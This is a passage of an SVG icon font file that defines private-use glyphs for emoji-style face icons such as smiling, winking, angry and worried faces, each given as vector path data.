<glyph unicode="&#xeb75;" glyph-name="face-open-mouth2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80z" />
<glyph unicode="&#xeb76;" glyph-name="face-open-mouth3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-79.529 0-144 35.817-144 80s64.471 80 144 80c79.529 0 144-35.817 144-80s-64.471-80-144-80zM528 224c61.856 0 112 21.49 112 48s-50.144 48-112 48c-61.856 0-112-21.49-112-48s50.144-48 112-48v0z" />
<glyph unicode="&#xeb77;" glyph-name="face-open-mouth4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c79.529 0 144 35.817 144 80s-64.471 80-144 80c-79.529 0-144-35.817-144-80s64.471-80 144-80z" />
<glyph unicode="&#xeb78;" glyph-name="winking-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM352 544v-32h128v32h-128zM496.598 256h95.651c26.372 0 47.751 21.667 47.751 47.85v16.15h32c0 0 0-16 0-32 0-32-32-64-64-64h-224v32h112.598z" />
<glyph unicode="&#xeb79;" glyph-name="winking-face2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM496.598 256h95.651c26.372 0 47.751 21.667 47.751 47.85v16.15h32c0 0 0-16 0-32 0-32-32-64-64-64h-224v32h112.598zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM352 544h128v-32h-128v32z" />
<glyph unicode="&#xeb7a;" glyph-name="laughing-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM288 352h480c0 0-32-192-240-192s-240 192-240 192zM331.027 320c0 0 41.198-128.43 197.761-128.43s195.766 128.43 195.766 128.43h-393.527z" />
<glyph unicode="&#xeb7b;" glyph-name="laughing-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM288 352c0 0 32-192 240-192s240 192 240 192h-480z" />
<glyph unicode="&#xeb7c;" glyph-name="laughing-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM288 352h480c0 0-32-192-240-192s-240 192-240 192zM331.027 320c0 0 41.198-128.43 197.761-128.43s195.766 128.43 195.766 128.43h-393.527zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128z" />
<glyph unicode="&#xeb7d;" glyph-name="laughing-face4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM288 352c0 0 32-192 240-192s240 192 240 192h-480zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128z" />
<glyph unicode="&#xeb7e;" glyph-name="smirking-face" d="M448 576c17.673 0 32-14.327 32-32s-14.327-32-32-32c-17.673 0-32 14.327-32 32h-64v32h96zM672 576c17.673 0 32-14.327 32-32s-14.327-32-32-32c-17.673 0-32 14.327-32 32h-64v32h96zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM496.598 256h95.651c26.372 0 47.751 21.667 47.751 47.85v16.15h32c0 0 0-16 0-32 0-32-32-64-64-64h-224v32h112.598z" />
<glyph unicode="&#xeb7f;" glyph-name="smirking-face2" d="M448 576c17.673 0 32-14.327 32-32s-14.327-32-32-32c-17.673 0-32 14.327-32 32h-64v32h96zM672 576c17.673 0 32-14.327 32-32s-14.327-32-32-32c-17.673 0-32 14.327-32 32h-64v32h96zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM496.598 256h95.651c26.372 0 47.751 21.667 47.751 47.85v16.15h32c0 0 0-16 0-32 0-32-32-64-64-64h-224v32h112.598z" />
<glyph unicode="&#xeb80;" glyph-name="stubborn-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 288v-32h288v32h-288zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xeb81;" glyph-name="stubborn-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 288v-32h288v32h-288zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xeb82;" glyph-name="neutral-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 288v-32h288v32h-288zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128z" />
<glyph unicode="&#xeb83;" glyph-name="neutral-face4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 288v-32h288v32h-288zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128z" />
<glyph unicode="&#xeb84;" glyph-name="sad-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64v0z" />
<glyph unicode="&#xeb85;" glyph-name="sad-face4" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM320 576h128v-32h-128v32zM608 576h128v-32h-128v32zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64z" />
<glyph unicode="&#xeb86;" glyph-name="smiling-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0z" />
<glyph unicode="&#xeb87;" glyph-name="smiling-face4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM320 576v-32h128v32h-128zM608 576v-32h128v32h-128zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64z" />
<glyph unicode="&#xeb88;" glyph-name="smiling-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb89;" glyph-name="smiling-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeb8a;" glyph-name="grinning-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0z" />
<glyph unicode="&#xeb8b;" glyph-name="grinning-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32z" />
<glyph unicode="&#xeb8c;" glyph-name="sad-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64v0zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb8d;" glyph-name="sad-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM527.402 288c111.402 0 176.598-64 176.598-64v32c0 0-65.195 64-176.598 64s-175.402-64-175.402-64v-32c0 0 64 64 175.402 64zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeb8e;" glyph-name="neutral-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 288v-32h288v32h-288zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb8f;" glyph-name="neutral-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 288v-32h288v32h-288zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeb90;" glyph-name="angry-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 288v-32h288v32h-288zM371.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM577.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb91;" glyph-name="angry-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 288v-32h288v32h-288zM371.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM577.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeb92;" glyph-name="worried-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128z" />
<glyph unicode="&#xeb93;" glyph-name="worried-face2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32zM384 480c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 480c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM608 640h128v-32h-128v32zM320 640h128v-32h-128v32z" />
<glyph unicode="&#xeb94;" glyph-name="winking-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM352 544v-32h128v32h-128zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0z" />
<glyph unicode="&#xeb95;" glyph-name="winking-face4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM352 544v-32h128v32h-128zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32z" />
<glyph unicode="&#xeb96;" glyph-name="angry-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0zM371.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM577.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb97;" glyph-name="angry-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM527.902 256c95.902 0 144.098-32 144.098-32s-32 96-144 96c-112 0-144-96-144-96s48 32 143.902 32zM371.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM577.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeb98;" glyph-name="grinning-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0z" />
<glyph unicode="&#xeb99;" glyph-name="grinning-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32z" />
<glyph unicode="&#xeb9a;" glyph-name="sad-face5" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0z" />
<glyph unicode="&#xeb9b;" glyph-name="sad-face6" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32z" />
<glyph unicode="&#xeb9c;" glyph-name="grinning-face-eyebrows3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128z" />
<glyph unicode="&#xeb9d;" glyph-name="grinning-face-eyebrows4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128z" />
<glyph unicode="&#xeb9e;" glyph-name="fake-grinning-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb9f;" glyph-name="fake-grinning-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeba0;" glyph-name="worried-face-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xeba1;" glyph-name="worried-face-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM527.902 256c95.902 0 144.098-32 144.098-32s-32 96-144 96c-112 0-144-96-144-96s48 32 143.902 32zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xeba2;" glyph-name="face-stuck-out-tongue" d="M416 320v-80c0-61.856 50.27-112 112-112 61.856 0 112 50.27 112 112v80h64v32h-352v-32h64zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM448 320h160v-80c0-44.491-35.817-80-80-80-44.491 0-80 35.817-80 80v80z" />
<glyph unicode="&#xeba3;" glyph-name="face-stuck-out-tongue2" d="M416 320h-64v32h352v-32h-64v-80c0-61.73-50.144-112-112-112-61.73 0-112 50.144-112 112v80zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM448 320v-80c0-44.183 35.509-80 80-80 44.183 0 80 35.509 80 80v80h-160z" />
<glyph unicode="&#xeba4;" glyph-name="face-stuck-out-tongue3" d="M416 320v-80c0-61.856 50.27-112 112-112 61.856 0 112 50.27 112 112v80h64v32h-352v-32h64zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM448 320h160v-80c0-44.491-35.817-80-80-80-44.491 0-80 35.817-80 80v80zM352 544v-32h128v32h-128z" />
